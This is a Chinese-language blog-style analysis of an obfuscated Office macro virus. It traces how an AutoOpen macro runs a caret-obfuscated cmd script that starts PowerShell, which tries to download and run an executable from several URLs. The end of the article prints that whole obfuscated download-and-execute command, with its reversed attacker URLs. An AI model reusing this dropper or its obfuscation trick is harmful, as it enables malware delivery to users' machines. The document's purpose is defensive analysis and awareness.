各種代碼混淆Office宏病毒的示例分析

這篇文章將為大家詳細講解有關各種代碼混淆Office宏病毒的示例分析，文章內容質量較高，因此小編分享給大家做個參考，希望大家閱讀完這篇文章后對相關知識有一定的了解。

前言

一些宏病毒為了躲過某些殺軟靜態檢測，采用一些混淆手段來使腳本更加不易檢測，通常做法是動態混淆解密達到其目的。

分析

下面我們拿一個真實病毒的作法來分析一下，測試環境:Win7x64+Office2010,病毒樣例sample.doc（MD5: a564137f74ea2d65f8538faf89ef3897)，在VirusTotal查找可以發現已被絕大部分殺軟給檢測到了。

用Office打開sample.doc提示需要開啟宏的信息（實際上是一張圖片，以防用戶機器沒有開啟宏，提示用戶去開啟它來達到感染的目的）

打開宏看到自動啟動AutoOpen()函數，VBA代碼基本上已混淆難以看懂

用F8單步調試一下定位到Shell調用外部命令位置

這里可以看出調用了CMD命令執行了一段bat字符串腳本

這段代碼咋一看也是混淆過的，這個里面有一個”^”符號，實際上這只是障眼法，這個符號沒有實際意義，cmd在執行過程中會忽略這個字符（在windows上測試cmd.exe打開”c^a^l^c.^e^x^e”,可以打開計算器calc.exe）,不過我在win10上拷貝這段腳本已被windows defender攔截了，說明微軟已添加rule檢測這類腳本，經過整理后發現依然是一段難易看懂的代碼，有興趣可以自己去拆分一下腳本更容易看懂，這里我將直接運行來看效果。

把這段腳本拷貝到cmd運行會發現cmd啟動了powershell.exe執行一段code.

這段稍容易看懂，它償試從url下載一個exe文件到public目錄下，但發現大小為0下載失敗，這個url鏈接已經無效了。（細心會發現它實際償試從5個url去下載exe文件），稍候該文件被自刪除。

由于這個樣例已被殺軟攔截，下載鏈接也已失效，所以沒法研究下載的exe做的事情，分享這篇文章是說明 一下混淆代碼已是病毒常用手段了。Office是大家常用的辦公軟件，建議大家在使用Office的時候將宏安全設置禁用宏，不要輕易打開未知來源的office文件。

文章中分析的腳本文本我列舉如下，以便有興趣的朋友去研究一下如何加解密bat腳本的。

CMd /V:^ON/C"^s^e^t r^k^w^b=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^  ^}^}^{^hc^tac^}^;^k^a^er^b^;n^t^I^$ ^m^et^I^-e^k^ovn^I^;)ntI^$^ ^,KC^G^$(e^l^iFda^o^lnw^o^D^.^A^t^z$^{^yr^t^{)^h^fr^$^ n^i^ ^KC^G^$(^hc^a^er^o^f^;^'^e^x^e.^'^+^YC^f^$^+^'^\^'^+c^i^l^b^up^:vne^$^=n^t^I^$^;^'^7^45^'^ ^=^ ^YC^f^$^;)^'^@^'(^t^i^l^p^S^.^'^I^3^B^k^S^S^h^6/^ur^.^5^5z^u^o^s^f^or^p//^:^p^t^t^h@^Gi^K^L^J^3^D^h^q^u/^gro^.c^e^dr^a^ka^d^ivav^iv//^:^p^t^t^h^@^f^H^T^P^O^i^7/^z^y^x^.^a^b^a^b^m^e^kr^o^g//^:^p^t^t^h^@^7^P^u^F^w^q^B^p^XV/^m^oc^.^k^p^k^a^s^p//^:p^t^t^h@^o^b2^qdn^B^p/^m^oc^.c^m^d^tc^a^p^moc//^:^p^t^t^h^'=^h^fr^$^;^tn^e^i^lC^b^e^W.^t^eN^ ^tc^e^j^bo^-^w^en^=^A^t^z^$^ ^l^l^e^hsr^ew^o^p&&^f^or /^L %^X ^in (^3^6^6^;^-^1;^0)^d^o ^s^e^t ^Sr^u^J=!^Sr^u^J!!r^k^w^b:~%^X,1!&&^i^f %^X=^=^0 c^a^l^l %^Sr^u^J:^~^6%"

關于各種代碼混淆Office宏病毒的示例分析就分享到這里了，希望以上內容可以對大家有一定的幫助，可以學到更多知識。如果覺得文章不錯，可以把它分享出去讓更多的人看到。